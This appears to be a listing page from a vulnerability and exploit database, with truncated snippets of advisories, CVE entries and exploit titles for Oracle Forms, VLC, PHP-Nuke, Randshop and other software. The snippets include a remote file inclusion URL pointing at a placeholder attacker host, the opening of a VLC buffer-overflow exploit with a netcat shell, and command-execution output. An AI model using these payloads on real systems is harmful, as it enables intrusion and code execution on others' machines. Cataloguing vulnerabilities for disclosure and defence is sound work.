Oracle Forms / Reports Remote Code Execution Exploit

This Metasploit module uses two vulnerabilities in Oracle forms and reports to get remote code execution on the host. The showenv url can be used to disclose information about a server. A second vulnerability that allows arbitrary reading and writing to the host filesystem can then be used to wri...

FlashCanvas 1.5 proxy.php XSS Vulnerability

Advisory Information Title: FlashCanvas proxy.php XSS Vulnerability Date published: 11 December 2013 Reference: CVE-2013-6880 Advisory Summary Script does not adequately verify the Referer header before requesting via curl the remote URL specified in the ‘url’ GET parameter and rendering it. Vend...

Ruby Gem Command Wrap Command Execution

Remote command execution in Ruby Gem Command Wrap 3/15/2013 http://rubygems.org/gems/commandwrap Commands executed if the remote URL or filename contains the shell character ';'. The commands will be executed as the client user if tricked into using the malicious URL or filename. Examining the...

CVE-2013-0095

Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebK...

Design/Logic Flaw

Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebK...

Mozilla Firefox v8.x - URL & SSL Spoofing Vulnerability

Document Title: =============== Mozilla Firefox v8.x - URL & SSL Spoofing Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=330 Release Date: ============= 2011-12-21 Vulnerability Laboratory ID VL-ID: ==================================== 330...

CVE-2011-3008

The default configuration of Avaya Secure Access Link SAL Gateway 1.5, 1.8, and 2.0 contains certain domain names in the Secondary Core Server URL and Secondary Remote Server URL fields, which allows remote attackers to obtain sensitive information by leveraging administrative access to these...

[security bulletin] HPSBMA02584 SSRT100230 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote URL Redirection

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02514953 Version: 1 HPSBMA02584 SSRT100230 rev.1 - HP System Management Homepage SMH for Linux and Windows, Remote URL Redirection NOTICE: The information in this Security Bulletin should be acte...

VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)

No description provided by source. !/usr/bin/perl 10/23/2008 ksOSe Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit 1 - Works on Windows XP SP1, SP2, SP3 and probably win2k 2 - Works both with a local file and with a remote url 3 - VLC do not crash! 4 - Enjoy a respawing shell, even if VLC wi...

VideoLAN VLC Media Player 0.9.4 - .ty Local Buffer Overflow (SEH)

VideoLAN VLC Media Player 0.9.4 - .ty Local Buffer Overflow SEH !/usr/bin/perl 10/23/2008 ksOSe Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit 1 - Works on Windows XP SP1, SP2, SP3 and probably win2k 2 - Works both with a local file and with a remote url 3 - VLC do not crash! 4 - Enjoy a...

VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)

!/usr/bin/perl 10/23/2008 ksOSe Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit 1 - Works on Windows XP SP1, SP2, SP3 and probably win2k 2 - Works both with a local file and with a remote url 3 - VLC do not crash! 4 - Enjoy a respawing shell, even if VLC will be closed! bUGGEd htdocs nc -l -...

Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion

Title : randshop = 1.1.1 Remote File Inclusion Vulnerability - URL : http://www.randshop.com/ - Author : OLiBekaS - contact : olibekasatgmail.com - dork : "software 2004-2005 by randshop" - exploit : http://target/path/includes/header.inc.php?dateiPfad=http://attacker/cmd.txt?&cmd=ls - greatz :...

mediaslashInclude.txt

author: Moroccan Security Team Vendor: www.MediaSlash.com Vendor Contacted greetz to : Moroccan Security Team CiM-TeaM and All Freinds Google : Powered by MediaSlash.com Details: MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability This flaw is due to an input validation error...

Valdersoft Shopping Cart 3.0 - Remote Command Execution

!/usr/bin/perl cijfer-vscxpl - Valdersoft Shopping Cart All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-vscxpl.pl -h www.valdersoft.com -d /store [email protected] /$ id;uname -a uid=2526apache gid=2524apache groups=2524apache, 10004psaserv FreeBSD valdersoft.com...

Advisory 10/2005: Yawp/YaWiki Remote URL Include Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: Yawp/YaWiki Remote URL Include Vulnerability Release Date: 2005/07/12 Last Modified: 2005/07/12 Author: Stefan Esser [email protected] Application: Yawp = 1.0.6 Severity...

ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution

source: https://www.securityfocus.com/bid/5028/info Zeroboard is a PHP web board package available for the Linux and Unix platforms. Under some circumstances, it may be possible to include arbitrary PHP files. The head.php file does not sufficiently check or sanitize input. When the "allowurlfope...

Проблема с баннерами в php-nuke (banner spoofing)

Можно удаленно поменять URL на которую ссылается баннер...

PHP-Nuke 1.02.53.04.x - Remote Ad Banner URL Change

PHP-Nuke 1.02.53.04.x - Remote Ad Banner URL Change source: https://www.securityfocus.com/bid/2544/info PHP-Nuke is a website creation/maintainence tool written in PHP3. A PHP-Nuke feature supporting cycling ad banners is subject to interference from a remote user. A querystring can be submitted ...

PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change

source: https://www.securityfocus.com/bid/2544/info PHP-Nuke is a website creation/maintainence tool written in PHP3. A PHP-Nuke feature supporting cycling ad banners is subject to interference from a remote user. A querystring can be submitted to an unpatched server which allows the remote user ...